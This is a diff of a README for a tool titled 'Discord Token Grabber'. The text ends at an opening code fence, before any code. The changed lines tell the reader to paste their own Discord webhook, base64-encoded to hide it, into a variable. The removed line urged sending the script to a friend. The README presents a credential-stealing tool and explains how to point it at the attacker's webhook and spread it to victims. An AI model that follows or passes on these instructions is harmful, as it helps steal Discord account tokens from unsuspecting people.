boomboom46789/s/README.md

 # Discord Token Grabber
-### chage the part at atob with your discord webhook (encode base64) and send the script to your friend!
+### change the value of nitrocode to your discord webhook as base64!
 ## A simple token grabber lol

 ```js